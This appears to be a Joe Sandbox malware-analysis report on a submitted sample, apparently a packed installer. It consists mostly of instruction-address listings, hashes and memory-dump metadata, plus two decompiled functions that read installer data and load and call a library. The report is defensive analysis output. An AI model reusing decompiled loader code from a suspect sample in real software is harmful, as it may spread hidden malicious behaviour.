                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x00000000
                                                    0x00407004
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406fc8
                                                    0x00406fc2
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407066
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x00407098
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000
                                                    0x00407175
                                                    0x00406fc2
                                                    0x00406f49
                                                    0x00406f46

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                    • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                    • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                    • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403283 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00403283(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x955a
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a24c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E33(1);
					return 0;
				}
				E00403402( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x73508
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004033EC(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
						_t19 =  *0x418ee0; // 0x1a4bd
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402E33(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E0040672B(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x40f919
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x955a
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E99( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                    0x00403286
                                                    0x00403293
                                                    0x004032a6
                                                    0x004032ab
                                                    0x004033db
                                                    0x004033dd
                                                    0x00000000
                                                    0x004033e3
                                                    0x004032b7
                                                    0x004032ca
                                                    0x004032d0
                                                    0x004032d6
                                                    0x004032e1
                                                    0x004032e1
                                                    0x004032e6
                                                    0x004032eb
                                                    0x004032f3
                                                    0x004032f5
                                                    0x004032f5
                                                    0x004032fe
                                                    0x00403305
                                                    0x00000000
                                                    0x00000000
                                                    0x0040330b
                                                    0x00403311
                                                    0x00403317
                                                    0x00000000
                                                    0x0040331d
                                                    0x00403323
                                                    0x0040332d
                                                    0x00403343
                                                    0x00403348
                                                    0x0040334d
                                                    0x00403353
                                                    0x00403359
                                                    0x00403363
                                                    0x0040336a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040336c
                                                    0x00403372
                                                    0x00403374
                                                    0x00403397
                                                    0x0040339d
                                                    0x00000000
                                                    0x00000000
                                                    0x0040339f
                                                    0x004033a1
                                                    0x00000000
                                                    0x00000000
                                                    0x004033a3
                                                    0x004033a3
                                                    0x004033b6
                                                    0x00000000
                                                    0x00000000
                                                    0x004033c5
                                                    0x00000000
                                                    0x004033c5
                                                    0x0040337e
                                                    0x00403385
                                                    0x004033d2
                                                    0x004033d8
                                                    0x004033d8
                                                    0x00000000
                                                    0x004033d8
                                                    0x00403387
                                                    0x0040338d
                                                    0x00403393
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004033d6
                                                    0x004033d6
                                                    0x00000000
                                                    0x004033d6
                                                    0x00000000

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00403297
                                                      • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                    • SetFilePointer.KERNELBASE(0000955A,00000000,00000000,00414ED0,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FilePointer$CountTick
                                                    • String ID:
                                                    • API String ID: 1092082344-0
                                                    • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                    • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                    • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                    • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2f8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x38)) = E00402C53(1);
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E0040665B( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x38)));
					if(_t38 == _t32) {
						E00405371(0xfffffff7,  *((intOrPtr*)(_t39 - 0x38)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004039FB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                    0x00402032
                                                    0x00402032
                                                    0x00402037
                                                    0x0040203e
                                                    0x004020fd
                                                    0x0040224b
                                                    0x0040224b
                                                    0x00402adb
                                                    0x00402ade
                                                    0x00402aea
                                                    0x00402aea
                                                    0x0040204d
                                                    0x00402057
                                                    0x0040205a
                                                    0x0040206a
                                                    0x0040206e
                                                    0x00402076
                                                    0x00402079
                                                    0x004020f6
                                                    0x00000000
                                                    0x004020f6
                                                    0x0040207b
                                                    0x00402086
                                                    0x0040208a
                                                    0x004020ca
                                                    0x0040208c
                                                    0x0040208f
                                                    0x00402092
                                                    0x004020be
                                                    0x00402094
                                                    0x00402097
                                                    0x004020a0
                                                    0x004020a2
                                                    0x004020a2
                                                    0x004020a0
                                                    0x00402092
                                                    0x004020d2
                                                    0x004020eb
                                                    0x004020eb
                                                    0x00000000
                                                    0x004020d2
                                                    0x0040205d
                                                    0x00402065
                                                    0x00402068
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                      • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD), ref: 004053CC
                                                      • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                      • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
